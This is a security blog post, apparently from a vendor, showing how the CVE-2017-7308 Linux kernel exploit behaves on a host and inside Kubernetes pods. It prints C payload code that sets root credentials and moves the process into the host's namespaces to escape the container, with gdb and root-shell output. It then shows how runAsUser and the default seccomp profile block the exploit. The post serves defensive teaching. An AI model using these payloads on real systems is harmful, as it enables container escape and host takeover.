Skip to main content

Kernel privilege escalation: how Kubernetes container isolation impacts privilege escalation attacks

Written by:
Kamil Potrec

Kamil Potrec

December 3, 2020

0 mins read

During the day, I spend my time analyzing Terraform code, Kubernetes object configuration files, and identifying common security issues. When the sun sets, I put on my hoodie, fire up Linux VMs and debuggers to look under the hood of technologies that make up the cloud native ecosystem.

In this post, we will explore how Kubernetes container isolation impacts privilege escalation attacks. We will use common kernel exploitation techniques to figure out how container abstractions layers can hinder our path to that precious root shell.

What is privilege escalation?

Privilege escalation is a term used to describe the process of obtaining more permissions to a resource. Kernel privilege escalation is a process of obtaining these permissions by exploiting a weakness in one of many kernel entry points, also referred to as attack vectors. An attack vector is simply a path which provides access to the vulnerable code.

We interact with the kernel in many ways, by reading from the file system, opening a device file,  issuing system calls, or sending a packet over the network interface. All of these actions require some sort of process to happen in the kernel space. When the kernel performs an action on behalf of the user process, we say that the kernel operates in a process context. Each process is represented in the kernel via a struct task_struct structure. These are stored in a circular doubly linked list, and accessed from PER_CPU variables on x86-64 architecture when a context switch happens from user space to kernel space.

A task_struct contains a struct creds member which holds the user identifier and capabilities associated with the process. This information is used by the kernel to determine if an action can be performed by the process, for example, if it is allowed to execute a specific syscall. The generic goal of the kernel privilege escalation process is to replace or update the credentials structure to gain more permissions.

How does privilege escalation work?

The most common technique to obtain elevated permissions in kernel space is to utilize the combination of kernel functions [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437)([prepare_kernel_cred(0)](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682)). This can only be achieved once an exploit obtained control over an instruction pointer (RIP), and successfully defeated memory access and randomization controls. [prepare_kernel_cred](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L682)can generate the credentials object based on an existing one, or more generously generate a default one with full root permissions. [commit_creds](https://github.com/torvalds/linux/blob/master/kernel/cred.c#L437) simply updates the task_struct of the current process with the new credential object.

typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

void get_root_payload(void) {
   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
   );
}

Kernel exploitation is a very large field, and so for this blog post, we will just explore an oversimplified version of kernel privilege escalation. There are numerous security controls in the kernel which are designed to make exploitation harder. SMEP, SMAP, KASLR, and KPTI are all mechanisms which are implemented in hardware or in the kernel and are turned on or off by the distribution you are using, or by a system administrator. There is no direct way to control these settings from Kubernetes and these are, therefore, out of scope for this post.

We will be using an old issue in the af_packet implementation that received CVE-2017-7308. The vulnerability is exploitable with the CAP_NET_RAW capability, as it requires access to raw sockets. Details of the vulnerability are exhaustively explained here, so we won’t go into that. We can obtain all the capabilities we need in an unprivileged user namespace. On the Ubuntu distribution, access to user namespaces is not restricted by default.

dev@node1:~/exploit$ grep CONFIG_USER_NS /boot/config-4.15.0-122-generic
CONFIG_USER_NS=y
dev@node1:~/exploit$ sudo sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1
dev@node1:~/exploit$

Let’s dig in

First off, let's look at the end-to-end process in a non-containerized environment first.

We need to connect GNU Debugger (gdb) to the Virtual Machine stub. Once the debugger is attached, we can set a breakpoint at a convenient location. In this case, we are using an mlock system call, which we can manually trigger from the exploit whenever we want to look at the internal state of the running process. Note that the gdb will only break if the executing process name is called “exploit”. This minimizes the risk of the breakpoint being triggered by some other process on the system. The setup tasks are conveniently scripted in a .gdb command file. We execute GDB with the -x flag to perform the setup in a consistent and repeatable way.

dev@pwnbox:/$ cat setup.gdb
set print pretty on
file vmlinux
target remote 127.0.0.1:11234
break sys_mlock if $_streq($lx_current().comm, "exploit")
continue
dev@pwnbox:/$ gdb -q -x setup.gdb
0xffffffff819c24be in native_safe_halt () at ./arch/x86/include/asm/irqflags.h:61
61  }
Breakpoint 1 at 0xffffffff8121da50: file mm/mlock.c, line 709.

Breakpoints will be triggered before the unprivileged user namespace is created, just before we execute the vulnerability, and after we obtained root credentials. We implement this behavior by simply executing the correct syscall.

syscall(149, 0, 0); // Break before CLONE_NEWUSER
if (unshare(CLONE_NEWUSER) != 0) {
   perror("[-] unshare(CLONE_NEWUSER)");
   exit(EXIT_FAILURE);
}
/* OMITTED */printf("[*] executing get root payload %p\n", &get_root_payload);
syscall(149, 0, 0); // Break before commit_creds
exploit_cve_2017_7308((void *)&get_root_payload);
printf("[*] done\n");
syscall(149, 0, 0); // Break after commit_creds

Now we can execute the exploit:

dev@node1:~/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x558abc4dd583

Our first breakpoint is triggered as expected. We can examine the cred structure by running gdb helper function $lx_current. The effective UID of the current process is 1000, and it has no effective capabilities in the current namespace as expected.

Thread 6 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$1 = {
 usage = {counter = 4},
 uid = { val = 1000 },
 gid = { val = 1000 },
 suid = { val = 1000 },
 sgid = { val = 1000 },
 euid = { val = 1000 },
 egid = { val = 1000 },
 fsuid = { val = 1000 },
 fsgid = { val = 1000 },
 securebits = 0,
 cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {0, 0} },
 cap_effective = { cap = {0, 0} },
 cap_bset = { cap = {4294967295, 63} },
 cap_ambient = { cap = {0, 0} },
 jit_keyring = 0 '\000',
 session_keyring = 0xffff888331051f00,
 process_keyring = 0x0 <irq_stack_union>,
 thread_keyring = 0x0 <irq_stack_union>,
 request_key_auth = 0x0 <irq_stack_union>,
 security = 0xffff8882bb29dd60,
 user = 0xffff88832dd89f00,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 group_info = 0xffff8882b9181480,
 {
   non_rcu = 0,
   rcu = {
     next = 0x0 <irq_stack_union>,
     func = 0x0 <irq_stack_union>
   }
 }
}
(gdb)

The second breakpoint is triggered after a call to unshare, and the new user namespace is created for the process. Observe how the UID remains unchanged, but cap_effective and user_ns attributes have changed. Capabilities are stored as a bitmask, which is more readable in hex format.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$2 = {
 /* OMITTED */ uid = { val = 1000 },
 gid = { val = 1000 },
 /* OMITTED */ euid = { val = 1000 },
 /* OMITTED */ cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {4294967295, 63} },
 cap_effective = { cap = {4294967295, 63} },
 /* OMITTED */ user = 0xffff88832dd89f00,
 user_ns = 0xffff8882c1e0b800,
 /* OMITTED */}
(gdb) p/x 4294967295
$4 = 0xffffffff 
(gdb)

Our last breakpoint is triggered after the vulnerability is exploited. Observe that UID is now set to 0, and user namespace is reset to init_user_ns which represents the host’s init user namespace.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$3 = {
 /* OMITTED */ uid = { val = 0 },
 /* OMITTED */ 
 euid = { val = 0 },
 /* OMITTED */ cap_effective = { cap = {4294967295, 63} },
 /* OMITTED */ user = 0xffffffff82454160 <root_user>,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 group_info = 0xffffffff8245b568 <init_groups>,
 /* OMITTED */ }

Our shell returns and we now have full root permissions on the host.

dev@node1:~/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x558abc4dd583
[*] done
[+] got r00t
root@node1:/home/dev/exploit# id
uid=0(root) gid=0(root) groups=0(root)
root@node1:/home/dev/exploit#

Kernel exploit in a container

Next, we will try to execute the very same exploit inside a pod. We have created a very simple pod object definition and deployed it into the cluster.

apiVersion: v1
kind: Pod
metadata:
 name: very-default-pod
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     command: [ "sleep", "infinity" ]

Lets see what happens in the default configuration.

dev@pwnbox:/$ kubectl get nodes
NAME    STATUS   ROLES    AGE   VERSION
node1   Ready    master   8d    v1.18.10
dev@pwnbox:/$ kubectl get pods
No resources found in default namespace.
dev@pwnbox:/$ kubectl apply -f very-default-pod.yaml
pod/test created
dev@pwnbox:/$ kubectl get pods
NAME   READY   STATUS    RESTARTS   AGE
test   1/1     Running   0          4s
dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
root@test:~# id
uid=0(root) gid=0(root) groups=0(root)

Root by default

The image that we used in the demo does not specify an unprivileged user, and by default, Kubernetes will not enforce the UID. So, it appears that we had root access without needing to exploit the kernel. We are re-running the very same exploit, and break the kernel just before it executes the vulnerable path. If you look at the effective capabilities of the process, it’s clear that some are missing. The value is set to 2818844155, which represents the default capability set granted by Docker runtime.

(gdb) p *($lx_current().cred)
$1 = {
 /* OMITTED */ euid = { val = 0 },
 /* OMITTED */ securebits = 0,
 cap_inheritable = { cap = {2818844155, 0} },
 cap_permitted = { cap = {2818844155, 0} },
 cap_effective = { cap = {2818844155, 0} },
 cap_bset = { cap = {2818844155, 0} },
 cap_ambient = { cap = {0, 0} },
 /* OMITTED */ 
 user = 0xffffffff82454160 <root_user>,
 user_ns = 0xffffffff824541e0 <init_user_ns>,
 /* OMITTED */ }

After the exploit completes, the effective set once again includes all of the capabilities.

Thread 1 hit Breakpoint 1, SyS_mlock (start=0, len=0) at mm/mlock.c:709
709 SYSCALL_DEFINE2(mlock, unsigned long, start, size_t, len)
(gdb) p *($lx_current().cred)
$2 = {
 /* OMITTED */ securebits = 0,
 cap_inheritable = { cap = {0, 0} },
 cap_permitted = { cap = {4294967295, 63} },
 cap_effective = { cap = {4294967295, 63} },
 cap_bset = { cap = {4294967295, 63} },
 /* OMITTED */}

This time we will enforce non-root user id on the container, by setting runAs security context attributes.

apiVersion: v1
kind: Pod
metadata:
 name: non-root-pod
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     securityContext:
       runAsUser: 1000
       runAsGroup: 1000
     command: [ "sleep", "infinity" ]

This time we don’t have the root permissions out of the box. The exploit, however, performs identically with one major difference in the final result. It appears that we have all the permissions but we don’t see everything on the system.

dev@pwnbox:/$ kubectl apply -f non-root-uid-pod.yaml
pod/test created
dev@pwnbox:/$ kubectl exec -it test -- /bin/bash
groups: cannot find name for group ID 1000
I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x55e55ff5a583
[*] done
[+] got r00t
root@test:/mnt/dev/exploit# id
uid=0(root) gid=0(root) groups=0(root)
root@test:/mnt/dev/exploit# cat /etc/shadow
root:*:18198:0:99999:7:::
daemon:*:18198:0:99999:7:::
bin:*:18198:0:99999:7:::
sys:*:18198:0:99999:7:::
sync:*:18198:0:99999:7:::
games:*:18198:0:99999:7:::
man:*:18198:0:99999:7:::
lp:*:18198:0:99999:7:::
mail:*:18198:0:99999:7:::
news:*:18198:0:99999:7:::
uucp:*:18198:0:99999:7:::
proxy:*:18198:0:99999:7:::
www-data:*:18198:0:99999:7:::
backup:*:18198:0:99999:7:::
list:*:18198:0:99999:7:::
irc:*:18198:0:99999:7:::
gnats:*:18198:0:99999:7:::
nobody:*:18198:0:99999:7:::
_apt:*:18198:0:99999:7:::
messagebus:*:18207:0:99999:7:::
root@test:/mnt/dev/exploit# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
   inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
   inet6 ::1/128 scope host
      valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
   link/ipip 0.0.0.0 brd 0.0.0.0
root@test:/mnt/dev/exploit#

Namespace cage

We managed to get all the capabilities and root UID, but only bypassed the capabilities barrier of the container—we still don’t have access to the host's filesystem, so we cannot see all the processes or even communicate over the host’s network interfaces.

root@test:~# ls -la /dev/
total 4
drwxr-xr-x 5 root root  360 Nov 23 14:04 .
drwxr-xr-x 1 root root 4096 Nov 23 14:04 ..
lrwxrwxrwx 1 root root   11 Nov 23 14:04 core -> /proc/kcore
lrwxrwxrwx 1 root root   13 Nov 23 14:04 fd -> /proc/self/fd
crw-rw-rw- 1 root root 1, 7 Nov 23 14:04 full
drwxrwxrwt 2 root root   40 Nov 23 14:04 mqueue
crw-rw-rw- 1 root root 1, 3 Nov 23 14:04 null
lrwxrwxrwx 1 root root    8 Nov 23 14:04 ptmx -> pts/ptmx
drwxr-xr-x 2 root root    0 Nov 23 14:04 pts
crw-rw-rw- 1 root root 1, 8 Nov 23 14:04 random
drwxrwxrwt 2 root root   40 Nov 23 14:04 shm
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stderr -> /proc/self/fd/2
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdin -> /proc/self/fd/0
lrwxrwxrwx 1 root root   15 Nov 23 14:04 stdout -> /proc/self/fd/1
-rw-rw-rw- 1 root root    0 Nov 23 14:04 termination-log
crw-rw-rw- 1 root root 5, 0 Nov 23 14:04 tty
crw-rw-rw- 1 root root 1, 9 Nov 23 14:04 urandom
crw-rw-rw- 1 root root 1, 5 Nov 23 14:04 zero
root@test:~# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4532   752 ?        Ss   14:04   0:00 sleep infinity
root         7  0.0  0.0  18504  3352 pts/0    Ss   14:04   0:00 /bin/bash
root        24  0.0  0.0  34400  2776 pts/0    R+   14:04   0:00 ps aux
root@test:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
   inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
   link/ipip 0.0.0.0 brd 0.0.0.0
4: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
   link/ether 4e:52:2c:19:28:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
   inet 10.233.90.139/32 scope global eth0
      valid_lft forever preferred_lft forever
root@test:~#

At this point, we can load any kernel modules we like but that is noisy and will trigger most basic intrusion detection systems (one would hope). To test this we will remove an unused module. Note your docker image needs to have module packages installed. In the case of Debian images, you will need to install the kmod package.

root@test:/mnt/dev/exploit# lsmod
Module                  Size  Used by
i2c_piix4              24576  0
binfmt_misc            20480  1
xt_CT                  16384  8
xt_tcpudp              16384  12
/* OMITTED */pata_acpi              16384  0
floppy                 77824  0
root@test:/mnt/dev/exploit# rmmod i2c_piix4
root@test:/mnt/dev/exploit# lsmod | grep i2c
root@test:/mnt/dev/exploit#

Instead, we can extend our kernel exploit and set the [struct nsproxy](https://github.com/torvalds/linux/blob/master/include/linux/nsproxy.h#L31) object in the current context to point to namespaces we like. Namespaces are identified by inodes, but the kernel exports the address of [init_nsproxy](https://github.com/torvalds/linux/blob/master/kernel/nsproxy.c#L32) which we can use to copy host’s init namespaces to our container.

(gdb) info address init_nsproxy
Symbol "init_nsproxy" is static storage at address 0xffffffff8245b2a0.
(gdb

The sys_setns syscall can be used to update namespaces for the process context. There are three primary namespaces we want to PrivEsc into: PID, Network, and Mount. First of all, we need to obtain the reference to root namespaces, we can do that by moving container PID 1 into the host’s namespaces. Then we can get references to any namespaces from the /proc/ file system of PID 1. Finally, move the current process into the required namespaces.

typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
typedef unsigned long long __attribute__((regparm(3))) (* _find_task_by_vpid)(unsigned int vnr);
typedef void __attribute__((regparm(3))) (* _switch_task_namespaces)(void *tsk, void *new);
typedef long __attribute__((regparm(4))) (* _do_sys_open)(int fd, const char *filename, int flags, unsigned short mode);
typedef long __attribute__((regparm(3))) (* _sys_setns)(int fd, int nstype);

void get_root_payload(void) {
   ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
       ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
   );
   // [1] - Identify PID 1 task in current PID namespace
   unsigned long long task = ((_find_task_by_vpid)(KERNEL_BASE + FIND_TASK_BY_VPID))(1);
   // [2] - Move PID 1 into init namespaces
   ((_switch_task_namespaces)(KERNEL_BASE + SWITCH_TASK_NS))((void *)task, (void *)(KERNEL_BASE + INIT_NSPROXY));
   // [3] - Read mount namespace inode
   long fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
   // [4] - Move current process into host’s mount namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
   // [5] - Read pid namespace inode
   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
   // [6] - Move current process into host’s pid namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
   // [7] - Read network namespace inode
   fd = ((_do_sys_open)(KERNEL_BASE + DO_SYS_OPEN))(AT_FDCWD, "/proc/1/ns/net", O_RDONLY, 0);
   // [8] - Move current process into host’s network namespace
   ((_sys_setns)(KERNEL_BASE + SYS_SETNS))( fd, 0 );
}

After our exploit is executed, we can access all of the interesting system resources.

I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ id
uid=1000 gid=1000 groups=1000
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[*] commit_creds:        ffffffff810b45e0
[*] prepare_kernel_cred: ffffffff810b4ad0
[*] executing get root payload 0x559f462d7583
[*] done
[+] got r00t
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)root@test:/# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.2  0.0 226012  9556 ?        Ss   14:30   0:02 /sbin/init nokaslr nopti
root         2  0.0  0.0      0     0 ?        S    14:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I    14:30   0:00 [kworker/0:0]
root         4  0.0  0.0      0     0 ?        I<   14:30   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   14:30   0:00 [mm_percpu_wq]
/* OMITTED */dev      18468  0.0  0.0   4532   724 ?        Ss   14:44   0:00 sleep infinity
dev      18642  0.0  0.0  18508  3360 pts/0    Ss   14:44   0:00 /bin/bash
root     19762  0.2  0.0   4516   752 pts/0    S    14:45   0:00 ./exploit
root     19767  0.0  0.0  18516  3412 pts/0    S    14:45   0:00 /bin/bash -i
root     19803  0.0  0.0  36708  3172 pts/0    R+   14:45   0:00 ps aux
root@test:/# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
   link/ether 52:54:00:8a:6e:73 brd ff:ff:ff:ff:ff:ff
   inet 10.100.100.80/24 brd 10.100.100.255 scope global dynamic ens3
      valid_lft 2704sec preferred_lft 2704sec
   inet6 fe80::5054:ff:fe8a:6e73/64 scope link
      valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
   link/ether 02:42:00:d6:f9:0a brd ff:ff:ff:ff:ff:ff
   inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
      valid_lft forever preferred_lft forever
4: kube-ipvs0: <BROADCAST,NOARP> mtu 1500 qdisc noop state DOWN group default
   link/ether 76:17:6a:aa:ea:9e brd ff:ff:ff:ff:ff:ff
   inet 10.233.59.218/32 brd 10.233.59.218 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.0.1/32 brd 10.233.0.1 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.0.3/32 brd 10.233.0.3 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
   inet 10.233.17.50/32 brd 10.233.17.50 scope global kube-ipvs0
      valid_lft forever preferred_lft forever
/* OMITTED */14: cali1037a54e65e@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
   link/ether ee:ee:ee:ee:ee:ee brd ff:ff:ff:ff:ff:ff link-netnsid 0
   inet6 fe80::ecee:eeff:feee:eeee/64 scope link
      valid_lft forever preferred_lft forever
root@test:/#
root@test:/# reboot
Failed to connect to bus: No data available

Usability of capabilities

Default capabilities assigned to Kubernetes containers (with the Docker runtime) grants CAP_NET_RAW to the container. Does this mean we would be able to exploit the vulnerability even if unprivileged user namespaces are disabled? We added code to set effective capabilities required to reach vulnerable code.

cap_t caps;
caps = cap_get_proc();
if (caps == NULL){
   perror("[-] Failed to get current caps\n");
   exit(EXIT_FAILURE);
}
cap_value_t cap_list[1];
cap_list[0] = CAP_NET_RAW;
if(cap_set_flag(caps, CAP_EFFECTIVE, 1, cap_list, CAP_SET) == -1){
   perror("[-] Failed to set effective caps\n");
   exit(EXIT_FAILURE);
}
if(cap_set_proc(caps) != 0){
   perror("[-] Failed to set process cpas\n");
   exit(EXIT_FAILURE);
}

As you can see the exploit fails, but why?

I have no name!@test:/root$ id
uid=1000 gid=1000 groups=1000
I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[-] unshare(CLONE_NEWUSER): Operation not permitted
I have no name!@test:/mnt/dev/exploit$

This has to do with inheritable capabilities and how they are implemented. Even though the container runtime has granted these capabilities to the processes in the container, these have to be explicitly set on as effective via sys_capset. At the moment, only processes with UID 0 can set effective capabilities. So, if you want to run as a non-root user, but still have access to some of the capabilities you need to include a suid binary in your container to set the effective capabilities. Alternatively, you can simply set required capabilities on the executable and drop the container capabilities. File capabilities are limited to file systems with extended attributes.

Seccomp to the rescue

Let’s now talk about attack vector reachability. Our exploit works because unprivileged users can obtain CAP_NET_RAW capability in unprivileged user namespaces. We saw how this impacts our exploit in the above discussion about capabilities. There is one more countermeasure we can use to stop this attack—and yes you can enable it via Kubernetes.

Seccomp is a mechanism which can be utilized to reduce the kernel's attack surface by filtering system calls. Unfortunately, by default, Kubernetes will not apply a seccomp profile to your container. This means that all system calls are allowed, subject to the already discussed permissions checks. We can change that by adding annotation to the object declaration (pre-v1.19), or by adding the seccomp profile attribute to the pod security context.

apiVersion: v1
kind: Pod
metadata:
 name: seccomp-pod
 annotations:
   seccomp.security.alpha.kubernetes.io/pod: runtime/default
spec:
 containers:
   - name: test
     image: digitalocean/doks-debug:latest
     command: [ "sleep", "infinity" ]

Let's have a look at how the default profile provided by the container runtime (in this case Docker) affects our exploit. We are greeted with “Operation not permitted” error, because The default seccomp profile does not allow the unshare syscall.

I have no name!@test:/root$ cd /mnt/dev/exploit/
I have no name!@test:/mnt/dev/exploit$ sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1
I have no name!@test:/mnt/dev/exploit$ ./exploit
[*] CVE-2017-7308 based on https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
[-] unshare(CLONE_NEWUSER): Operation not permitted
I have no name!@test:/mnt/dev/exploit$

Seccomp is great in limiting unnecessary kernel entry points. System calls, such as unshare, or userfaultfd, can be safely disabled for most use cases and are great at stopping some exploitation techniques. But there are some calls that would be tricky to block, such as waitid. You can find these and more techniques to exploit containers here.

Conclusions

We managed to prevent this exploit with a default seccomp profile. As you can see, even though our operating system is vulnerable, the exploit path is unreachable from our container (on this occasion). This technique could give you enough breathing room to plan the very much needed update to the operating system! You should consider these measures as defense-in-depth controls and mitigation strategies.

Always patch your systems! Snyk Infrastructure as Code can help you catch these mitigation options early on in your CI/CD pipeline, way before anything is deployed in production. We use adversarial techniques to identify high impact security options in Kubernetes, and cloud service providers. Use Snyk for free by registering for a free account.

How to Build a Security Champions Program

Snyk interviewed 20+ security leaders who have successfully and unsuccessfully built security champions programs. Check out this playbook to learn how to run an effective developer-focused security champions program.